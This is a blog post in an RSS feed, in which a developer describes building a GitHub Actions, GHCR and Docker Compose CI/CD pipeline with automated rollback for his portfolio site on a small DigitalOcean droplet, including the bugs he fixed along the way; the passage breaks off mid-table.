      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Tue, 10 Feb 2026 07:23:44 +0000</pubDate>
      <link>https://forem.com/lfariaus/from-git-pull-to-gitops-how-i-built-a-production-cicd-pipeline-on-a-12-digitalocean-droplet-34gn</link>
      <guid>https://forem.com/lfariaus/from-git-pull-to-gitops-how-i-built-a-production-cicd-pipeline-on-a-12-digitalocean-droplet-34gn</guid>
      <description>&lt;p&gt;&lt;strong&gt;From 15-minute manual deploys with downtime to 5-minute automated pipelines with 2-second container swaps: how I transformed my portfolio's deployment workflow using GitHub Actions, GHCR, and Docker Compose.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"If deploying scares you, you're not deploying often enough."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  ⚠️ The Problem:
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Manual Deploys Don't Scale
&lt;/h3&gt;

&lt;p&gt;My portfolio (&lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;) runs a full-stack application on a single &lt;a href="https://www.digitalocean.com/products/droplets" rel="noopener noreferrer"&gt;DigitalOcean droplet&lt;/a&gt;. The stack is real — not a static site, but a living MERN application with authentication, a chatbot, rate limiting, and a GraphQL API.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Infrastructure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Ubuntu 24.10 droplet (2GB RAM, 1 vCPU, 70GB disk)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Docker Compose (5 containers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Next.js 16 (standalone mode)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node.js + Express + Apollo Server + GraphQL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;MongoDB 4.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cache&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Reverse Proxy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NGINX with SSL (Let's Encrypt)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Every time I wanted to ship a change, here's what I did:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# The "old way" — every single time&lt;/span&gt;
ssh root@my-server
&lt;span class="nb"&gt;cd&lt;/span&gt; /var/www/portfolio
git pull origin master
docker compose down          &lt;span class="c"&gt;# Site goes DOWN&lt;/span&gt;
docker compose build         &lt;span class="c"&gt;# 10+ minutes on 1 vCPU&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt;         &lt;span class="c"&gt;# Pray it works&lt;/span&gt;
docker compose logs          &lt;span class="c"&gt;# Check for errors&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The pain points were real:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;10+ minutes of downtime&lt;/strong&gt; per deploy (building Node.js/Next.js on a 1 vCPU machine)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No automated tests&lt;/strong&gt; — I could push broken code directly to production&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No rollback&lt;/strong&gt; — if something broke, I'd manually &lt;code&gt;git revert&lt;/code&gt; and rebuild&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fear of pushing&lt;/strong&gt; — every deploy was a gamble&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Goal
&lt;/h3&gt;

&lt;p&gt;Turn this into a one-step process:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git push origin master → ✅ Tests → 📦 Build → 🚀 Deploy → 🔔 Discord ping
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With automated rollback if anything goes wrong.&lt;/p&gt;




&lt;h2&gt;
  
  
  🏛️ The Architecture:
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;GitHub Actions → GHCR → DigitalOcean&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Here's the pipeline I designed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frknzrr6lo64uq4jhhj8r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frknzrr6lo64uq4jhhj8r.png" alt="Continuous Integration Pipeline - Mermaid Diagram" width="800" height="1593"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The key insight:&lt;/strong&gt; Don't build on the server. Build in GitHub Actions (free runners with 7GB RAM), push to GHCR, and just &lt;em&gt;pull&lt;/em&gt; on the VPS.&lt;/p&gt;




&lt;h2&gt;
  
  
  📝 The Journey:
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;20+ Iterations, 8 Bugs, 1 Working Pipeline&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This didn't work on the first try. Or the fifth. Here's the honest changelog — every failure and its fix.&lt;/p&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/107" rel="noopener noreferrer"&gt;Epic 2.6 - CI/CD Pipeline for DigitalOcean Droplet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/search?q=repo%3Alfariabr%2Fluisfaria.dev+%28ci%29&amp;amp;type=commits&amp;amp;s=committer-date&amp;amp;o=desc" rel="noopener noreferrer"&gt;All 20+ commits to (ci) feature&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Phase 1: Foundation (Issues 1-3)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;GitHub Actions + Docker Registry + SSH Access&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Setting up the basics: a CI workflow that runs Jest tests in parallel, builds Docker images, and pushes them to GitHub Container Registry.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/ci.yml (simplified)&lt;/span&gt;
&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;backend-test&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm ci&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm test -- --coverage&lt;/span&gt;

  &lt;span class="na"&gt;frontend-test&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm ci&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm test -- --coverage&lt;/span&gt;

  &lt;span class="na"&gt;docker-build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;backend-test&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;frontend-test&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;docker/build-push-action@v5&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
          &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ghcr.io/lfariabr/luisfaria.dev/frontend:latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For secure server access, I created a dedicated &lt;code&gt;deploy&lt;/code&gt; user with Docker permissions and ED25519 SSH keys stored in GitHub Secrets. No root access, no passwords — just key-based auth.&lt;/p&gt;




&lt;h3&gt;
  
  
  Phase 2: Deployment + Rollback (Issues 4-5)
&lt;/h3&gt;

&lt;p&gt;The deploy step SSHs into the server, pulls the latest images, and restarts containers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;docker-build&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;appleboy/ssh-action@v1.0.3&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;host&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.DEPLOY_HOST }}&lt;/span&gt;
          &lt;span class="na"&gt;username&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.DEPLOY_USER }}&lt;/span&gt;
          &lt;span class="na"&gt;key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.DEPLOY_KEY }}&lt;/span&gt;
          &lt;span class="na"&gt;script&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
            &lt;span class="s"&gt;cd /var/www/portfolio&lt;/span&gt;

            &lt;span class="s"&gt;# Save rollback point&lt;/span&gt;
            &lt;span class="s"&gt;git rev-parse HEAD &amp;gt; /var/lib/deploy-rollback/commit.txt&lt;/span&gt;

            &lt;span class="s"&gt;# Pull pre-built images (FAST!)&lt;/span&gt;
            &lt;span class="s"&gt;docker compose pull&lt;/span&gt;

            &lt;span class="s"&gt;# Swap containers (~2 seconds)&lt;/span&gt;
            &lt;span class="s"&gt;docker compose up -d --force-recreate --remove-orphans&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Automated rollback saves the current commit SHA before each deploy. If health checks fail, the pipeline automatically reverts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Auto-rollback on failure&lt;/span&gt;
&lt;span class="nv"&gt;PREV_COMMIT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /var/lib/deploy-rollback/commit.txt&lt;span class="si"&gt;)&lt;/span&gt;
git reset &lt;span class="nt"&gt;--hard&lt;/span&gt; &lt;span class="nv"&gt;$PREV_COMMIT&lt;/span&gt;
docker compose up &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--force-recreate&lt;/span&gt; &lt;span class="nt"&gt;--remove-orphans&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Phase 3: The Hard Part — 8 Bugs in 11 Iterations
&lt;/h3&gt;

&lt;p&gt;This is where things got real. Here's every failure I hit:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Error&lt;/th&gt;
&lt;th&gt;Root Cause&lt;/th&gt;
&lt;th&gt;Fix&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ssh: unable to authenticate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Wrong format for &lt;code&gt;DEPLOY_KEY&lt;/code&gt; secret&lt;/td&gt;
&lt;td&gt;Pasted full private key content (not fingerprint)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;dubious ownership in repository&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Deploy user ≠ repo owner&lt;/td&gt;
&lt;td&gt;&lt;code&gt;git config --global --add safe.directory&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Permission denied .git/FETCH_HEAD&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;File ownership mismatch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;chown -R deploy:deploy /var/www/portfolio&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;local changes would be overwritten&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Server had uncommitted drift&lt;/td&gt;
&lt;td&gt;Switched from &lt;code&gt;git pull&lt;/code&gt; to &lt;code&gt;git reset --hard&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Deploy timeout&lt;/strong&gt; (CPU maxed)&lt;/td&gt;
&lt;td&gt;Building images on a $12 droplet&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Stopped building on server&lt;/strong&gt; — pull from GHCR instead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;&lt;code&gt;502 Bad Gateway&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Frontend container crashed + NGINX stale DNS&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;--force-recreate&lt;/code&gt; + &lt;code&gt;nginx -s reload&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Container name conflict&lt;/td&gt;
&lt;td&gt;Dead container blocking recreation&lt;/td&gt;
&lt;td&gt;Added &lt;code&gt;--force-recreate&lt;/code&gt; flag&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Cannot find module @apollo/server/express4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Apollo Server v5 breaking change&lt;/td&gt;
&lt;td&gt;Installed &lt;code&gt;@as-integrations/express4&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bug #5 was the turning point.&lt;/strong&gt; I was building Docker images &lt;em&gt;on the server&lt;/em&gt; — a 1 vCPU machine trying to compile Next.js and Node.js simultaneously. It would timeout after 10 minutes, CPU pegged at 100%.&lt;/p&gt;

&lt;p&gt;The fix was embarrassingly obvious: &lt;strong&gt;I was already building images in GitHub Actions.&lt;/strong&gt; Just use them!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# docker-compose.yml — BEFORE (slow, broke the server)&lt;/span&gt;
&lt;span class="na"&gt;webapp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./frontend&lt;/span&gt;

&lt;span class="c1"&gt;# docker-compose.yml — AFTER (fast, reliable)&lt;/span&gt;
&lt;span class="na"&gt;webapp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ghcr.io/lfariabr/luisfaria.dev/frontend:latest&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Bug #6 was the sneakiest.&lt;/strong&gt; After deploying new images, the site returned &lt;code&gt;502 Bad Gateway&lt;/code&gt;. The frontend container was running and responding on port 3000. But NGINX couldn't reach it. Why?&lt;/p&gt;

&lt;p&gt;Docker Compose assigns internal IPs to containers. When &lt;code&gt;--force-recreate&lt;/code&gt; destroys and recreates a container, it gets a &lt;em&gt;new IP&lt;/em&gt;. NGINX had cached the &lt;em&gt;old IP&lt;/em&gt;. The fix: reload NGINX after container recreation.&lt;/p&gt;




&lt;h2&gt;
  
  
  🏆 The Unexpected Hero: TDD
&lt;/h2&gt;

&lt;p&gt;Here's a story I didn't expect to tell: After the pipeline was working, I made a simple change — added "2026" to my portfolio's timeline section. Pushed to master. The CI pipeline kicked in... and &lt;strong&gt;blocked the deploy&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Why? My Jest tests validated the timeline data, and "2026" wasn't in the expected values.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;FAIL  src/__tests__/components/sections/TimelineSection.test.tsx
  ✕ should render timeline years correctly
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I fixed the test, pushed again, and the deploy went through automatically. The pipeline caught a bug that would have been invisible in a manual workflow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TDD doesn't just catch logic errors — it catches deployment errors too.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  📊 Result
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deploy time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;15-20 min (manual SSH + build)&lt;/td&gt;
&lt;td&gt;~5 min (automated end-to-end)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Downtime&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;10+ min (docker build on server)&lt;/td&gt;
&lt;td&gt;~2 seconds (container swap)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rollback&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Manual &lt;code&gt;git revert&lt;/code&gt; + rebuild&lt;/td&gt;
&lt;td&gt;Automatic on health check failure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Test coverage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;None before deploy&lt;/td&gt;
&lt;td&gt;Full Jest suite (backend + frontend)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Notifications&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check server logs manually&lt;/td&gt;
&lt;td&gt;Discord ping on success/failure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Confidence&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Afraid to push on Friday&lt;/td&gt;
&lt;td&gt;Push anytime, pipeline has my back&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Pipeline Stats
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total CI time:&lt;/strong&gt; ~5 minutes (tests → build → push → deploy)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Container swap downtime:&lt;/strong&gt; ~2 seconds&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Image pull time:&lt;/strong&gt; ~15 seconds (vs 10+ min for &lt;code&gt;docker build&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reliability:&lt;/strong&gt; 100% after hardening (11 iterations)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  📌 Key Takeaways
&lt;/h2&gt;

&lt;p&gt;Five lessons from building CI/CD on a budget:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Don't Build on Small VPS
&lt;/h3&gt;

&lt;p&gt;Offload compilation to CI runners. GitHub Actions gives you 7GB RAM and 2 vCPUs for free. Your $12 droplet should only &lt;em&gt;pull&lt;/em&gt; and &lt;em&gt;run&lt;/em&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. TDD Is Your Deployment Safety Net
&lt;/h3&gt;

&lt;p&gt;Tests caught bugs I would have shipped to production. The pipeline won't deploy what doesn't pass — and that's the point.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Force-Recreate Everything
&lt;/h3&gt;

&lt;p&gt;Stale containers cause mysterious failures. Always use &lt;code&gt;docker compose up -d --force-recreate&lt;/code&gt; in CI. The 2-second overhead is worth the reliability.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Reload NGINX After Container Swaps
&lt;/h3&gt;

&lt;p&gt;Docker DNS caches container IPs. After &lt;code&gt;--force-recreate&lt;/code&gt;, NGINX still points to the old IP. Always &lt;code&gt;nginx -s reload&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Fail Fast, Log Everything
&lt;/h3&gt;

&lt;p&gt;Every one of those 8 bugs was diagnosed through logs. Verbose output in CI scripts is not noise — it's your debugging lifeline.&lt;/p&gt;




&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;td&gt;Test, build, deploy orchestration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Registry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHCR (GitHub Container Registry)&lt;/td&gt;
&lt;td&gt;Docker image storage, tagged by SHA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Next.js 16 (standalone)&lt;/td&gt;
&lt;td&gt;SSR portfolio with React 19&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node.js + Apollo Server 5 + GraphQL&lt;/td&gt;
&lt;td&gt;API with auth, rate limiting, chatbot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;MongoDB 4.4&lt;/td&gt;
&lt;td&gt;Document storage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cache&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;Rate limiting, session management&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Proxy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NGINX + Let's Encrypt&lt;/td&gt;
&lt;td&gt;SSL termination, reverse proxy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Infra&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;DigitalOcean Droplet&lt;/td&gt;
&lt;td&gt;Ubuntu 24.10, Docker Compose&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Notifications&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Discord Webhooks&lt;/td&gt;
&lt;td&gt;Deploy success/failure alerts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Testing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Jest&lt;/td&gt;
&lt;td&gt;Unit + integration tests (backend + frontend)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Future Roadmap
&lt;/h2&gt;

&lt;p&gt;While the current pipeline covers the essentials, there's room to grow:&lt;/p&gt;

&lt;h3&gt;
  
  
  Staging Environment
&lt;/h3&gt;

&lt;p&gt;Branch-based deployments with a separate staging environment for pre-production testing. Currently deferred — the portfolio doesn't justify the cost of a second droplet.&lt;/p&gt;

&lt;h3&gt;
  
  
  Monitoring &amp;amp; Alerting
&lt;/h3&gt;

&lt;p&gt;Sentry for error tracking, uptime monitoring, and resource alerts. Current health checks cover the basics, but production-grade observability is the next evolution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Zero-Downtime Deploys
&lt;/h3&gt;

&lt;p&gt;True zero-downtime with multi-replica services and rolling updates via Docker Swarm or a lightweight orchestrator. Current ~2s downtime is acceptable for a portfolio, but the architecture is ready for it.&lt;/p&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;The full CI/CD implementation is open source:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
